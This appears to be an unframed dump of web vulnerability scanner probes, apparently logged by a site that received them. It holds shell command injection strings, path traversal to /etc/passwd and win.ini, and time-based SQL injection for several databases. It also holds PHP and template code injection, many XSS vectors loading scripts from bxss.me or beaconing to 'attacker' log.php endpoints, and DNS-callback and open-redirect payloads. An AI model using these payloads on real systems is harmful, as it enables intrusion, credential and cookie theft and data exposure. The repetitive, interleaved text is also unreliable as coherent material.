|echo ufhpra$()\ ohlpac\nz^xyu||a #' |echo ufhpra$()\ ohlpac\nz^xyu||a #|" |echo ufhpra$()\ ohlpac\nz^xyu||a #

file:///etc/passwd

&echo flmxig$()\ oirdcy\nz^xyu||a #' &echo flmxig$()\ oirdcy\nz^xyu||a #|" &echo flmxig$()\ oirdcy\nz^xyu||a #

";print(md5(31337));$a="

../../../../../../../../../../../../../../windows/win.ini

/../../../../../../../../../../windows/system32/BITSADMIN.exe

-1 OR 3*2<(0+5+952-952)

../../../../../../../../../../../../../../etc/passwd

-1 OR 3+952-952-1=0+0+0+1

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

echo bxkbma$()\ agmffz\nz^xyu||a #' &echo bxkbma$()\ agmffz\nz^xyu||a #|" &echo bxkbma$()\ agmffz\nz^xyu||a #

-1 OR 2+952-952-1=0+0+0+1

/../../../../../../../../../../windows/system32/BITSADMIN.exe

-1 OR 3*2>(0+5+663-663) --

-1 OR 3*2<(0+5+663-663) --

-1 OR 3+663-663-1=0+0+0+1 --

-1 OR 2+663-663-1=0+0+0+1 --

"||sleep(27*1000)*tozlle||"

eNu27IFT

'||sleep(27*1000)*nnbqwq||'

"&&sleep(27*1000)*qyihuj&&"

'&&sleep(27*1000)*kinlhv&&'

l2Mlxfmr

'"()

&n901463=v992063

'.print(md5(31337)).'

^(#$!@#$)(()))******

".gethostbyname(lc("hitdd"."gevqbhgr462d5.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(83).chr(109).chr(73)."

&n996154=v980883

!(()&&!|*|*|

${@print(md5(31337))}\

${@print(md5(31337))}

)

";print(md5(31337));$a="

';print(md5(31337));$a='

'.gethostbyname(lc('hitpa'.'oqxyqzrvaa7b4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(66).chr(104).chr(88).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

".gethostbyname(lc("hittc"."cfybjgph67e38.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(84).chr(114).chr(66)."

'.gethostbyname(lc('hitba'.'yqpfeuxq5f8aa.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(77).chr(118).chr(74).'

"||sleep(27*1000)*gfqprz||"

1NG59bppO

'||sleep(27*1000)*dyqlqt||'

^(#$!@#$)(()))******

"&&sleep(27*1000)*wkthti&&"

'&&sleep(27*1000)*jmeeep&&'

'"()

!(()&&!|*|*|

1GtysVcSO

1<aKIL8Qr<

1<img sRc='http://attacker-9460/log.php?

1<a8Iws22 x=9849>

1<ifRAme sRc=9439.com></IfRamE>

1<WFSYED>KYDIU[!+!]</WFSYED>

1fgMza

1}body{zzz:Expre/**/SSion(5EZC(9679))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=5EZC(9708)>

�<img zzz onmouseover=5EZC(93671) //�>

1&lt;ScRiPt&gt;5EZC(9632)&lt;/sCripT&gt;

1\u003CScRiPt\5EZC(9624)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%35%45%5A%43%289026%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9455)>

1<img src=xyz OnErRor=5EZC(9297)>

1<img src=//xss.bxss.me/t/dot.gif onload=5EZC(9311)>

1<body onload=5EZC(9095)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9232'>

1<isindex type=image src=1 onerror=5EZC(9998)>

1<aXQaGGs<

1<svg

1<InvalidTag

1<img sRc='http://attacker-9529/log.php?

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9035></ScRiPt>

1<InvalidTag

1<anMgK2c x=9336>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%35%45%5A%43%28%39%30%30%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<ifRAme sRc=9348.com></IfRamE>

1<InvalidTag>5EZC(9951)</script>9951

1<WG3QMD>BEXKK[!+!]</WG3QMD>

1<InvalidTag>5EZC(9029)</script>

1vh3Z0

<InvalidTag >6Wer(9230)</ScRiPt>

1<WOLHLB>TRNYJ[!+!]</WOLHLB>

1}body{zzz:Expre/**/SSion(6Wer(9385))}

1<InvalidTag >5EZC(9700)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=jaVaScRiPT:>

dfb__${98991*97996}__::.x

<a HrEF=http://xss.bxss.me></a>

dfb[[${98991*97996}]]xca

1<input autofocus onfocus=6Wer(9689)>

dfb{{98991*97996}}xca

�<img zzz onmouseover=6Wer(99791) //�>

1&lt;ScRiPt&gt;6Wer(9163)&lt;/sCripT&gt;

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1\u003CScRiPt\6Wer(9850)\u003C/sCripT\u003E

<th:t="${dfb}#foreach

%31%3C%53%63%52%69%50%74%20%3E%36%57%65%72%289366%29%3C%2F%73%43%72%69%70%54%3E

<%={{={@{#{${dfb}}%>

1<img/src=">" onerror=alert(9318)>

bfgx5218%C0%BEz1%C0%BCz2a%90bcxhjl5218

1<img src=xyz OnErRor=6Wer(9246)>

bfg8873%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8873

1<img src=//xss.bxss.me/t/dot.gif onload=6Wer(9977)>

1<body onload=6Wer(9500)>

19543593

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9468'>

'"()&%<zzz><InvalidTag >5EZC(9500)</ScRiPt>

1<isindex type=image src=1 onerror=6Wer(9894)>

1'"()&%<zzz><InvalidTag >5EZC(9279)</ScRiPt>

1<svg

� onload=6Wer(9818);>

1<InvalidTag

>6Wer(9343)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9870></ScRiPt>

1<InvalidTag

>6Wer(9281)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%36%57%65%72%28%39%33%31%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>6Wer(9907)</script>9907

1<InvalidTag>6Wer(9690)</script>

1<WPO0V2>Q5IAO[!+!]</WPO0V2>

1<InvalidTag >6Wer(9771)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

<th:t="${dfb}#foreach

1

<%={{={@{#{${dfb}}%>

bfgx2300%C0%BEz1%C0%BCz2a%90bcxhjl2300

bfg10944%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10944

19001724

'"()&%<zzz><InvalidTag >6Wer(9598)</ScRiPt>

1'"()&%<zzz><InvalidTag >6Wer(9522)</ScRiPt>

1<a6PyCZ4<

1<img sRc='http://attacker-9038/log.php?

1<abiT1lY x=9541>

1<ifRAme sRc=9369.com></IfRamE>

1<WTPOHS>00IDA[!+!]</WTPOHS>

1hOyBY

1}body{zzz:Expre/**/SSion(fPVY(9798))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=fPVY(9833)>

�<img zzz onmouseover=fPVY(99421) //�>

1&lt;ScRiPt&gt;fPVY(9973)&lt;/sCripT&gt;

1\u003CScRiPt\fPVY(9742)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%66%50%56%59%289475%29%3C%2F%73%43%72%69%70%54%3E

1<acdk056<

1<img/src=">" onerror=alert(9686)>

1<img sRc='http://attacker-9655/log.php?

1<img src=xyz OnErRor=fPVY(9412)>

1<aEUgXSr x=9927>

1<img src=//xss.bxss.me/t/dot.gif onload=fPVY(9440)>

1<ifRAme sRc=9270.com></IfRamE>

1<body onload=fPVY(9632)>

1<WASB44>YGFVZ[!+!]</WASB44>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9114'>

1e4nmG

<InvalidTag >ASA7(9782)</ScRiPt>

1<isindex type=image src=1 onerror=fPVY(9732)>

1}body{zzz:Expre/**/SSion(ASA7(9941))}

1<svg

<a HrEF=jaVaScRiPT:>

1<InvalidTag

<a HrEF=http://xss.bxss.me></a>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9492></ScRiPt>

1<input autofocus onfocus=ASA7(9545)>

1<InvalidTag

�<img zzz onmouseover=ASA7(96151) //�>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%66%50%56%59%28%39%32%35%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1&lt;ScRiPt&gt;ASA7(9955)&lt;/sCripT&gt;

1<InvalidTag>fPVY(9528)</script>9528

1<InvalidTag>fPVY(9321)</script>

1<WIY2ON>XRSTK[!+!]</WIY2ON>

1\u003CScRiPt\ASA7(9218)\u003C/sCripT\u003E

1<InvalidTag >fPVY(9849)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

%31%3C%53%63%52%69%50%74%20%3E%41%53%41%37%289739%29%3C%2F%73%43%72%69%70%54%3E

dfb[[${98991*97996}]]xca

1<img/src=">" onerror=alert(9842)>

dfb{{98991*97996}}xca

1<img src=xyz OnErRor=ASA7(9031)>

1<img src=//xss.bxss.me/t/dot.gif onload=ASA7(9499)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1<body onload=ASA7(9471)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9842'>

1<isindex type=image src=1 onerror=ASA7(9336)>

<th:t="${dfb}#foreach

1<svg

� onload=ASA7(9181);>

1<InvalidTag

>ASA7(9801)</ScRiPt>

<%={{={@{#{${dfb}}%>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9867></ScRiPt>

bfgx4059%C0%BEz1%C0%BCz2a%90bcxhjl4059

1<InvalidTag

>ASA7(9700)</ScRiPt>

bfg6484%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6484

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%41%53%41%37%28%39%31%35%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>ASA7(9354)</script>9354

1<InvalidTag>ASA7(9287)</script>

19191087

'"()&%<zzz><InvalidTag >fPVY(9823)</ScRiPt>

1<WKOJFI>BSGFK[!+!]</WKOJFI>

1'"()&%<zzz><InvalidTag >fPVY(9323)</ScRiPt>

1<InvalidTag >ASA7(9682)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

<th:t="${dfb}#foreach

1

<%={{={@{#{${dfb}}%>

bfgx7794%C0%BEz1%C0%BCz2a%90bcxhjl7794

bfg9364%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9364

19462456

'"()&%<zzz><InvalidTag >ASA7(9461)</ScRiPt>

1'"()&%<zzz><InvalidTag >ASA7(9802)</ScRiPt>

@@C6YI1

����%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1evbod7Qt')) OR 626=(SELECT 626 FROM PG_SLEEP(15))--

1AzaEjbut') OR 434=(SELECT 434 FROM PG_SLEEP(15))--

1wwRSSvWq' OR 26=(SELECT 26 FROM PG_SLEEP(15))--

1-1)) OR 928=(SELECT 928 FROM PG_SLEEP(15))--

1-1) OR 361=(SELECT 361 FROM PG_SLEEP(15))--

1-1 OR 652=(SELECT 652 FROM PG_SLEEP(15))--

1AqReytpd')); waitfor delay '0:0:15' --

1UD8T9chU'); waitfor delay '0:0:15' --

1K6hHqeY6'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+18-18) --

-1" OR 3*2<(0+5+18-18) --

-1" OR 3+18-18-1=0+0+0+1 --

-1" OR 2+18-18-1=0+0+0+1 --

-1' OR 3*2>(0+5+833-833) or 'cq2zg5st'='

-1' OR 3*2<(0+5+833-833) or 'cq2zg5st'='

-1' OR 3+833-833-1=0+0+0+1 or 'cq2zg5st'='

-1' OR 2+833-833-1=0+0+0+1 or 'cq2zg5st'='

-1' OR 3*2>(0+5+71-71) --

-1' OR 3*2<(0+5+71-71) --

-1' OR 3+71-71-1=0+0+0+1 --

-1' OR 2+71-71-1=0+0+0+1 --

-1 OR 3*2>(0+5+561-561)

-1 OR 3*2<(0+5+561-561)

-1 OR 3+561-561-1=0+0+0+1

-1 OR 2+561-561-1=0+0+0+1

-1 OR 3*2>(0+5+70-70) --

-1 OR 3*2<(0+5+70-70) --

-1 OR 3+70-70-1=0+0+0+1 --

-1 OR 2+70-70-1=0+0+0+1 --

1

1

1<afe5zOK<

1<img sRc='http://attacker-9093/log.php?

1<asnR3Mw x=9578>

1<ifRAme sRc=9087.com></IfRamE>

1<WL4W9Q>H78D0[!+!]</WL4W9Q>

1p7s4H

1}body{zzz:Expre/**/SSion(lz5X(9864))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=lz5X(9789)>

�<img zzz onmouseover=lz5X(94471) //�>

1&lt;ScRiPt&gt;lz5X(9738)&lt;/sCripT&gt;

1\u003CScRiPt\lz5X(9571)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%6C%7A%35%58%289410%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9801)>

1<img src=xyz OnErRor=lz5X(9311)>

1<img src=//xss.bxss.me/t/dot.gif onload=lz5X(9475)>

1<body onload=lz5X(9410)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9975'>

1<isindex type=image src=1 onerror=lz5X(9811)>

1<svg

1<InvalidTag

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9988></ScRiPt>

1<InvalidTag

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6C%7A%35%58%28%39%36%37%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>lz5X(9510)</script>9510

1<InvalidTag>lz5X(9618)</script>

1<apEoDFW<

1<WLDAWE>ITMR7[!+!]</WLDAWE>

1<img sRc='http://attacker-9928/log.php?

1<aIcT1qZ x=9002>

1<InvalidTag >lz5X(9438)</ScRiPt>

1<ifRAme sRc=9487.com></IfRamE>

1<WBDJNI>DX07B[!+!]</WBDJNI>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1SHI4J

<InvalidTag >NWYi(9940)</ScRiPt>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

1}body{zzz:Expre/**/SSion(NWYi(9003))}

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=NWYi(9433)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

�<img zzz onmouseover=NWYi(97241) //�>

1&lt;ScRiPt&gt;NWYi(9090)&lt;/sCripT&gt;

<th:t="${dfb}#foreach

1\u003CScRiPt\NWYi(9611)\u003C/sCripT\u003E

<%={{={@{#{${dfb}}%>

%31%3C%53%63%52%69%50%74%20%3E%4E%57%59%69%289371%29%3C%2F%73%43%72%69%70%54%3E

bfgx2365%C0%BEz1%C0%BCz2a%90bcxhjl2365

1<img/src=">" onerror=alert(9310)>

bfg8294%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8294

1<img src=xyz OnErRor=NWYi(9781)>

19400839

'"()&%<zzz><InvalidTag >lz5X(9446)</ScRiPt>

1<img src=//xss.bxss.me/t/dot.gif onload=NWYi(9280)>

1'"()&%<zzz><InvalidTag >lz5X(9342)</ScRiPt>

1<body onload=NWYi(9774)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9135'>

1<isindex type=image src=1 onerror=NWYi(9574)>

1<svg

� onload=NWYi(9261);>

1<InvalidTag

>NWYi(9705)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9314></ScRiPt>

1<InvalidTag

>NWYi(9804)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4E%57%59%69%28%39%35%36%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>NWYi(9939)</script>9939

1<InvalidTag>NWYi(9027)</script>

1<WWOJC1>SHVRS[!+!]</WWOJC1>

1<InvalidTag >NWYi(9900)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

<th:t="${dfb}#foreach

1

<%={{={@{#{${dfb}}%>

bfgx3657%C0%BEz1%C0%BCz2a%90bcxhjl3657

bfg8498%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8498

19418716

'"()&%<zzz><InvalidTag >NWYi(9154)</ScRiPt>

1'"()&%<zzz><InvalidTag >NWYi(9725)</ScRiPt>

1<aLm1O0o<

1<img sRc='http://attacker-9509/log.php?

1<anKcU5d x=9192>

1<ifRAme sRc=9339.com></IfRamE>

1<ayxsuzd<

1<WJMGAK>AUONU[!+!]</WJMGAK>

1k07bB

1<img sRc='http://attacker-9720/log.php?

1<a1VzIfI x=9368>

1}body{zzz:Expre/**/SSion(ZOT5(9653))}

1<ifRAme sRc=9270.com></IfRamE>

<a HrEF=jaVaScRiPT:>

1<WV8OGQ>66TJT[!+!]</WV8OGQ>

<a HrEF=http://xss.bxss.me></a>

@@2vcVa

����%2527%2522\'\"

1<input autofocus onfocus=ZOT5(9928)>

1SGRHg

<InvalidTag >XXx4(9932)</ScRiPt>

'"

1}body{zzz:Expre/**/SSion(XXx4(9960))}

�<img zzz onmouseover=ZOT5(93851) //�>

<a HrEF=jaVaScRiPT:>

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1&lt;ScRiPt&gt;ZOT5(9555)&lt;/sCripT&gt;

<a HrEF=http://xss.bxss.me></a>

1\u003CScRiPt\ZOT5(9953)\u003C/sCripT\u003E

1<input autofocus onfocus=XXx4(9408)>

%31%3C%53%63%52%69%50%74%20%3E%5A%4F%54%35%289529%29%3C%2F%73%43%72%69%70%54%3E

�<img zzz onmouseover=XXx4(90271) //�>

1<img/src=">" onerror=alert(9343)>

1&lt;ScRiPt&gt;XXx4(9090)&lt;/sCripT&gt;

1<img src=xyz OnErRor=ZOT5(9681)>

1<img src=//xss.bxss.me/t/dot.gif onload=ZOT5(9228)>

1\u003CScRiPt\XXx4(9385)\u003C/sCripT\u003E

1<body onload=ZOT5(9211)>

%31%3C%53%63%52%69%50%74%20%3E%58%58%78%34%289866%29%3C%2F%73%43%72%69%70%54%3E

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9344'>

1<img/src=">" onerror=alert(9167)>

1<isindex type=image src=1 onerror=ZOT5(9904)>

1<img src=xyz OnErRor=XXx4(9622)>

1<svg

1<img src=//xss.bxss.me/t/dot.gif onload=XXx4(9132)>

1<InvalidTag

1<body onload=XXx4(9790)>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9846></ScRiPt>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9639'>

1<InvalidTag

1<isindex type=image src=1 onerror=XXx4(9114)>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%4F%54%35%28%39%32%30%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<svg

� onload=XXx4(9267);>

1<InvalidTag>ZOT5(9717)</script>9717

1<InvalidTag

>XXx4(9065)</ScRiPt>

1<InvalidTag>ZOT5(9750)</script>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9855></ScRiPt>

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1<WZRB80>NZWP0[!+!]</WZRB80>

1<InvalidTag

>XXx4(9963)</ScRiPt>

1<InvalidTag >ZOT5(9813)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%58%78%34%28%39%34%33%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag>XXx4(9866)</script>9866

dfb__${98991*97996}__::.x

1<InvalidTag>XXx4(9058)</script>

dfb[[${98991*97996}]]xca

1<WDYBBB>1KPCU[!+!]</WDYBBB>

dfb{{98991*97996}}xca

1<InvalidTag >XXx4(9731)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

1

bfgx7167%C0%BEz1%C0%BCz2a%90bcxhjl7167

bfg8900%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8900

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

19651763

1

'"()&%<zzz><InvalidTag >ZOT5(9397)</ScRiPt>

<th:t="${dfb}#foreach

1'"()&%<zzz><InvalidTag >ZOT5(9824)</ScRiPt>

1

<%={{={@{#{${dfb}}%>

1zh9YrJjG')) OR 488=(SELECT 488 FROM PG_SLEEP(15))--

bfgx4361%C0%BEz1%C0%BCz2a%90bcxhjl4361

bfg5132%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5132

19427105

'"()&%<zzz><InvalidTag >XXx4(9610)</ScRiPt>

1'"()&%<zzz><InvalidTag >XXx4(9380)</ScRiPt>

1j6eeSTv3') OR 687=(SELECT 687 FROM PG_SLEEP(15))--

1QlWFaWQX' OR 608=(SELECT 608 FROM PG_SLEEP(15))--

1-1)) OR 719=(SELECT 719 FROM PG_SLEEP(15))--

1-1) OR 980=(SELECT 980 FROM PG_SLEEP(15))--

1-1 OR 353=(SELECT 353 FROM PG_SLEEP(15))--

1<abYdT9u<

1<img sRc='http://attacker-9010/log.php?

1<al2lvYk x=9769>

1<ifRAme sRc=9108.com></IfRamE>

1<WLZKZI>7LIUC[!+!]</WLZKZI>

1Z2JBO

<InvalidTag >djUG(9224)</ScRiPt>

1}body{zzz:Expre/**/SSion(djUG(9186))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=djUG(9721)>

�<img zzz onmouseover=djUG(94301) //�>

1&lt;ScRiPt&gt;djUG(9961)&lt;/sCripT&gt;

1\u003CScRiPt\djUG(9449)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%64%6A%55%47%289227%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9537)>

1<img src=xyz OnErRor=djUG(9533)>

1<img src=//xss.bxss.me/t/dot.gif onload=djUG(9460)>

1M2RyWtoC')); waitfor delay '0:0:15' --

1<body onload=djUG(9241)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9316'>

1<isindex type=image src=1 onerror=djUG(9057)>

1<svg

� onload=djUG(9848);>

1<InvalidTag

>djUG(9801)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9789></ScRiPt>

1<InvalidTag

>djUG(9836)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%64%6A%55%47%28%39%37%36%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>djUG(9336)</script>9336

1<InvalidTag>djUG(9254)</script>

1<WYKU9U>P2R1O[!+!]</WYKU9U>

1<InvalidTag >djUG(9136)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

<th:t="${dfb}#foreach

1

<%={{={@{#{${dfb}}%>

bfgx6020%C0%BEz1%C0%BCz2a%90bcxhjl6020

1aUDudcmL'); waitfor delay '0:0:15' --

bfg5871%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5871

19405931

'"()&%<zzz><InvalidTag >djUG(9995)</ScRiPt>

1<aUA9MCI<

1<img sRc='http://attacker-9793/log.php?

1<ajax2z5 x=9071>

1<ifRAme sRc=9148.com></IfRamE>

1<WQFPGC>MQDH8[!+!]</WQFPGC>

1Ln6dl

1}body{zzz:Expre/**/SSion(djUG(9504))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=djUG(9998)>

�<img zzz onmouseover=djUG(91371) //�>

1rASICJKl'; waitfor delay '0:0:15' --

1&lt;ScRiPt&gt;djUG(9185)&lt;/sCripT&gt;

1\u003CScRiPt\djUG(9630)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%64%6A%55%47%289596%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9356)>

1<img src=xyz OnErRor=djUG(9828)>

1<img src=//xss.bxss.me/t/dot.gif onload=djUG(9560)>

1<body onload=djUG(9275)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9051'>

1<isindex type=image src=1 onerror=djUG(9104)>

1<svg

/\xfs.bxss.me?hkbakels.com.hk

1<InvalidTag

//xfs.bxss.me?hkbakels.com.hk

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9326></ScRiPt>

xfs.bxss.me?hkbakels.com.hk

http://xfs.bxss.me?hkbakels.com.hk

1<InvalidTag

977636

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%64%6A%55%47%28%39%32%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

xfs.bxss.me

1<InvalidTag>djUG(9673)</script>9673

1<InvalidTag>djUG(9725)</script>

1<WP9MJJ>TOE5O[!+!]</WP9MJJ>

1<InvalidTag >djUG(9161)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca


1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<!--

'"

<%={{={@{#{${dfb}}%>

bfgx2269%C0%BEz1%C0%BCz2a%90bcxhjl2269

bfg5203%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5203

19063897

1-1 waitfor delay '0:0:15' --

'"()&%<zzz><InvalidTag >djUG(9132)</ScRiPt>

/\xfs.bxss.me?hkbakels.com.hk

1'"()&%<zzz><InvalidTag >djUG(9614)</ScRiPt>

//xfs.bxss.me?hkbakels.com.hk

bxss.me

<!--

WEB-INF\web.xml

c:/windows/win.ini

xfs.bxss.me?hkbakels.com.hk

/etc/shells

WEB-INF/web.xml

'"

http://bxss.me/t/fit.txt%3F.jpg

